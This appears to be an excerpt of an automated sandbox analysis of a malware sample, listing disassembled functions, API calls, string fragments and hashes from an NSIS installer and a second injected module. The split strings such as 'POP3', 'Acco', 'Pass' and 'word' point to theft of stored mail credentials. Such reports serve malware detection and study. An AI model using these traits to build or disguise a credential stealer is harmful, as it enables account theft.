                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                              • String ID: N
                                                                                                                                                              • API String ID: 3103080414-1130791706
                                                                                                                                                              • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                                                                                                              • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                                                                                                              • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                                                                                                              • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 665 3685173a-368517fe call 3685c030 call 36852c40 * 2 672 36851803 call 36851cca 665->672 673 36851808-3685180c 672->673 674 36851812-36851816 673->674 675 368519ad-368519b1 673->675 674->675 676 3685181c-36851837 call 36851ede 674->676 679 3685183d-36851845 676->679 680 3685199f-368519ac call 36851ee7 * 2 676->680 681 36851982-36851985 679->681 682 3685184b-3685184e 679->682 680->675 684 36851995-36851999 681->684 685 36851987 681->685 682->681 686 36851854-36851881 call 368544b0 * 2 call 36851db7 682->686 684->679 684->680 688 3685198a-3685198d call 36852c40 685->688 699 36851887-3685189f call 368544b0 call 36851db7 686->699 700 3685193d-36851943 686->700 694 36851992 688->694 694->684 699->700 716 368518a5-368518a8 699->716 701 36851945-36851947 700->701 702 3685197e-36851980 700->702 701->702 704 36851949-3685194b 701->704 702->688 706 36851961-3685197c call 368516aa 704->706 707 3685194d-3685194f 704->707 706->694 709 36851955-36851957 707->709 710 36851951-36851953 707->710 713 3685195d-3685195f 709->713 714 36851959-3685195b 709->714 710->706 710->709 713->702 713->706 714->706 714->713 717 368518c4-368518dc call 368544b0 call 36851db7 716->717 718 368518aa-368518c2 call 368544b0 call 36851db7 716->718 717->684 727 368518e2-3685193b call 368516aa call 368515da call 36852c40 * 2 717->727 718->717 718->727 727->684
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 36851CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 36851D1B
                                                                                                                                                                • Part of subcall function 36851CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 36851D37
                                                                                                                                                                • Part of subcall function 36851CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36851D4B
                                                                                                                                                              • _strlen.LIBCMT ref: 36851855
                                                                                                                                                              • _strlen.LIBCMT ref: 36851869
                                                                                                                                                              • _strlen.LIBCMT ref: 3685188B
                                                                                                                                                              • _strlen.LIBCMT ref: 368518AE
                                                                                                                                                              • _strlen.LIBCMT ref: 368518C8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                              • API String ID: 3296212668-3023110444
                                                                                                                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                              • Instruction ID: e30db13fdb0d253bf25c875d3792911db3c2911e3cf4b87b6faa2f24ff241cfb
                                                                                                                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                              • Instruction Fuzzy Hash: 57611475D00218AFEF118BA9CC40BEEBBB9AF4D304F81409AD394A7250DB745A46CF96

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strlen
                                                                                                                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                              • API String ID: 4218353326-230879103
                                                                                                                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                              • Instruction ID: fb0b2285ba4e398188217cd1e8d9d501ba4cf9233f2b51832d15cd539a65f080
                                                                                                                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                              • Instruction Fuzzy Hash: 417114B5D002285BDF129BA98C94AEE7BFC9F0D340F110096D744E7241EA74DB89CBA1

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                              • DrawTextA.USER32(00000000,0042EC20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                              • String ID: F
                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                              • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                                                                                                              • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                                                                                                              • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                                                                                                              • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                                                                                                              • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                                                                                                                                • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                                                                                                                • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                                                                                                              • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                                                                                                                              • wsprintfA.USER32 ref: 00405DDB
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                                                                                                              • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                                                                                                                • Part of subcall function 00405C90: GetFileAttributesA.KERNEL32(00000003,00402EE1,00436C00,80000000,00000003), ref: 00405C94
                                                                                                                                                                • Part of subcall function 00405C90: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                              • String ID: %s=%s$[Rename]
                                                                                                                                                              • API String ID: 2171350718-1727408572
                                                                                                                                                              • Opcode ID: 9a95bfeda5c53b018fe09f3750e4747cc6a042449e28eeaa199560d843d4c122
                                                                                                                                                              • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                                                                                                              • Opcode Fuzzy Hash: 9a95bfeda5c53b018fe09f3750e4747cc6a042449e28eeaa199560d843d4c122
                                                                                                                                                              • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                                                                                                              APIs
                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 36857D06
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 368590D7
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 368590E9
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 368590FB
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 3685910D
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 3685911F
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 36859131
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 36859143
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 36859155
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 36859167
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 36859179
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 3685918B
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 3685919D
                                                                                                                                                                • Part of subcall function 368590BA: _free.LIBCMT ref: 368591AF
                                                                                                                                                              • _free.LIBCMT ref: 36857CFB
                                                                                                                                                                • Part of subcall function 3685571E: HeapFree.KERNEL32(00000000,00000000,?,3685924F,?,00000000,?,00000000,?,36859276,?,00000007,?,?,36857E5A,?), ref: 36855734
                                                                                                                                                                • Part of subcall function 3685571E: GetLastError.KERNEL32(?,?,3685924F,?,00000000,?,00000000,?,36859276,?,00000007,?,?,36857E5A,?,?), ref: 36855746
                                                                                                                                                              • _free.LIBCMT ref: 36857D1D
                                                                                                                                                              • _free.LIBCMT ref: 36857D32
                                                                                                                                                              • _free.LIBCMT ref: 36857D3D
                                                                                                                                                              • _free.LIBCMT ref: 36857D5F
                                                                                                                                                              • _free.LIBCMT ref: 36857D72
                                                                                                                                                              • _free.LIBCMT ref: 36857D80
                                                                                                                                                              • _free.LIBCMT ref: 36857D8B
                                                                                                                                                              • _free.LIBCMT ref: 36857DC3
                                                                                                                                                              • _free.LIBCMT ref: 36857DCA
                                                                                                                                                              • _free.LIBCMT ref: 36857DE7
                                                                                                                                                              • _free.LIBCMT ref: 36857DFF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                              • Opcode ID: 9a05e4df2729fdcfc00d49e6301bf364090e8ccd719f3d0b3e85733d62caa923
                                                                                                                                                              • Instruction ID: 86c0cc899db2c3601e0dce919be35fdf299d22351feea60e40a69a839c267234
                                                                                                                                                              • Opcode Fuzzy Hash: 9a05e4df2729fdcfc00d49e6301bf364090e8ccd719f3d0b3e85733d62caa923
                                                                                                                                                              • Instruction Fuzzy Hash: CA316F75910204DFEB119A39DC48B7E77EAEF08390F628469EB58D7154DF35A880CB12
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                                                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                                                                                                              • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                                                                                                              • lstrcmpiA.KERNEL32(0042E3C0,0042A890), ref: 00404774
                                                                                                                                                              • lstrcatA.KERNEL32(?,0042E3C0), ref: 00404780
                                                                                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                                                                                                                                • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                                                                                                                                • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,00435000,74DF3410,00436400,00000000,00403323,00436400,00436400,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                                                                                                                • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                                                                                                                • Part of subcall function 004063D2: CharNextA.USER32(?,00435000,74DF3410,00436400,00000000,00403323,00436400,00436400,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                                                                                                                • Part of subcall function 004063D2: CharPrevA.USER32(?,?,74DF3410,00436400,00000000,00403323,00436400,00436400,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,?,00429860,?,?,000003FB,?), ref: 00404850
                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                                                                                                                • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                                                                                                                • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                                                                                                                • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: A
                                                                                                                                                              • API String ID: 2624150263-3554254475
                                                                                                                                                              • Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                                                                                                                              • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                                                                                                              • Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                                                                                                                              • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EB2
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400), ref: 00402ECE
                                                                                                                                                                • Part of subcall function 00405C90: GetFileAttributesA.KERNEL32(00000003,00402EE1,00436C00,80000000,00000003), ref: 00405C94
                                                                                                                                                                • Part of subcall function 00405C90: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003), ref: 00402F1A
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                                                                                                                              Strings
                                                                                                                                                              • Inst, xrefs: 00402F86
                                                                                                                                                              • @TA, xrefs: 00402F2F
                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
                                                                                                                                                              • soft, xrefs: 00402F8F
                                                                                                                                                              • Error launching installer, xrefs: 00402EF1
                                                                                                                                                              • Null, xrefs: 00402F98
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                              • String ID: @TA$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                              • API String ID: 2803837635-1648965382
                                                                                                                                                              • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                                                                                                              • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                                                                                                                              • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                                                                                                              • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(0042E3C0,00000400), ref: 004062B5
                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0042E3C0,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405256,74DF23A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                                                                                                              • SHGetPathFromIDListA.SHELL32(74DF23A0,0042E3C0), ref: 00406312
                                                                                                                                                              • CoTaskMemFree.OLE32(74DF23A0), ref: 0040631E
                                                                                                                                                              • lstrcatA.KERNEL32(0042E3C0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                                                                                                              • lstrlenA.KERNEL32(0042E3C0,?,0042A070,00000000,00405256,0042A070,00000000,00000000,?,74DF23A0), ref: 00406394
                                                                                                                                                              Strings
                                                                                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040633C
                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406284
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                              • API String ID: 717251189-730719616
                                                                                                                                                              • Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                                                                                                                              • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                                                                                                              • Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                                                                                                                              • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 368559EA
                                                                                                                                                                • Part of subcall function 3685571E: HeapFree.KERNEL32(00000000,00000000,?,3685924F,?,00000000,?,00000000,?,36859276,?,00000007,?,?,36857E5A,?), ref: 36855734
                                                                                                                                                                • Part of subcall function 3685571E: GetLastError.KERNEL32(?,?,3685924F,?,00000000,?,00000000,?,36859276,?,00000007,?,?,36857E5A,?,?), ref: 36855746
                                                                                                                                                              • _free.LIBCMT ref: 368559F6
                                                                                                                                                              • _free.LIBCMT ref: 36855A01
                                                                                                                                                              • _free.LIBCMT ref: 36855A0C
                                                                                                                                                              • _free.LIBCMT ref: 36855A17
                                                                                                                                                              • _free.LIBCMT ref: 36855A22
                                                                                                                                                              • _free.LIBCMT ref: 36855A2D
                                                                                                                                                              • _free.LIBCMT ref: 36855A38
                                                                                                                                                              • _free.LIBCMT ref: 36855A43
                                                                                                                                                              • _free.LIBCMT ref: 36855A51
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: 95177e34c26c40adfd58efa8e47d3f422cd1cf9099b6c1de303c542e5391ad92
                                                                                                                                                              • Instruction ID: 2322548b48d7d2cfb053d875cc82045e535bdf61e14bf4b31a062a34873bf217
                                                                                                                                                              • Opcode Fuzzy Hash: 95177e34c26c40adfd58efa8e47d3f422cd1cf9099b6c1de303c542e5391ad92
                                                                                                                                                              • Instruction Fuzzy Hash: 7611747A521148EFCB11DF58DC41CED3FB5EF08290B5681A5BA188B225DB31DA509B82
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                                                                              • Opcode ID: 9f1fefb1cbccfb5015f9b68219e121a8e86758a95e95f3254f6aeefac5a527e4
                                                                                                                                                              • Instruction ID: ca76564cfa14fc30d062555afce2f94f51f261d0ff33c795418f5512c91035be
                                                                                                                                                              • Opcode Fuzzy Hash: 9f1fefb1cbccfb5015f9b68219e121a8e86758a95e95f3254f6aeefac5a527e4
                                                                                                                                                              • Instruction Fuzzy Hash: 69515DB490061DCFEF019FA9E9C45DCBFB1FB1E218F524185E780B6254CBB68A24C799
                                                                                                                                                              APIs
                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 36851D1B
                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 36851D37
                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36851D4B
